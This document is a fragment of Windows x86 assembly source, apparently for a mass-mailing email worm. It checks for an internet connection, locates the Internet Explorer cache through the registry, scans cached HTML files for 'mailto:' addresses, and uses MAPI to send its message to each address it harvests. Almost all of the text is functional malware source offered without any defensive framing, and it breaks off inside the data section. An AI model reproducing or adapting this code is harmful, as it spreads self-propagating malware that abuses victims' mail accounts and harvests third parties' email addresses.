@pushsz "InternetGetConnectedState"
push hdll
callx GetProcAddress
test eax,eax
jz FIN
mov netcheck,eax
jmp NET
DODO:
push 5000
callx Sleep
NET:
push 00h
push offset Temp
call [netcheck]
dec eax
jnz DODO
NET_OK:
push 40h
@pushsz "Loft Story"
@pushsz "Welcome to Internet !"
push 00h
callx MessageBoxA
FINDLL:
push [hdll]
callx FreeLibrary

REG:
push offset RegHandle
push 001F0000h ; KEY_QUERY_VALUE
push 00h
@pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
push HKEY_USERS
callx RegOpenKeyExA
test eax,eax
jnz FIN

push offset BufferSize
push offset Buffer
push 00h ;ValueType
push 00h
@pushsz "Cache"
push RegHandle
callx RegQueryValueExA

push [RegHandle]
callx RegCloseKey

TIF_CUR:
push offset Buffer
callx SetCurrentDirectoryA
call FFF

FIN:
push 00h
callx ExitProcess

FFF:
push offset HTM
@pushsz "*.htm*"
callx FindFirstFileA
mov edi,eax
cmp eax,-1
je FIN
P_HTM:
call parse_html
FNF:
push offset HTM
push edi
callx FindNextFileA
test eax,eax
jnz P_HTM
FC:
push edi
callx FindClose
ret

parse_html:
pushad
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset HTM.FileName
callx CreateFileA ;open the file
inc eax
je FIN
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA ;create the file mapping
test eax,eax
je ph_close
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
callx MapViewOfFile ;map the file
test eax,eax
je ph_close2
xchg eax,esi
push 00h
push ebx
callx GetFileSize ;get its size
xchg eax,ecx
jecxz ph_close3
ls_scan_mail:
call @mt
db 'mailto:'
@mt:
pop edi
l_scan_mail:
pushad
push 7
pop ecx
rep cmpsb ;search for "mailto:"
popad ;string
je scan_mail ;check the mail address
inc esi
loop l_scan_mail ;in a loop
ph_close3:
push esi
callx UnmapViewOfFile ;unmap view of file
ph_close2:
push ebp
callx CloseHandle ;close file mapping
ph_close:
push ebx
callx CloseHandle ;close the file
popad
ret

scan_mail:
xor edx,edx
add esi,7
mov edi,offset mail_address ;where to store the
push edi ;mail address
n_char:
lodsb
cmp al,' '
je s_char
cmp al,'"'
je e_char
cmp al,''''
je e_char
cmp al,'@'
jne o_a
inc edx
o_a:
stosb
jmp n_char
s_char:
inc esi
jmp n_char
e_char:
xor al,al
stosb
pop edi
test edx,edx ;if EDX=0, mail is not
je ls_scan_mail ;valid (no '@')

call mapi_init
test eax,eax
jne ls_scan_mail
call send
call close

jmp ls_scan_mail

mapi_init:
xor eax,eax
push offset MAPIHandle
push eax
push eax
push eax
push eax
push eax
callx MAPILogon
ret
send:
xor eax,eax
push eax
push eax
push offset sMessage
push eax
push [MAPIHandle]
callx MAPISendMail
ret
close:
xor eax,eax
push eax
push eax
push eax
push 12345678h
MAPIHandle = dword ptr $-4
callx MAPILogoff
ret
add_ad:
;@pushsz "C:\carnet.txt"
;push offset mail_address
;push offset mail_address
;@pushsz "Carnet d'adresses"
;callx WritePrivateProfileStringA
ret

.data
htmd: db '
Internet Explorer
',0dh,0ah db '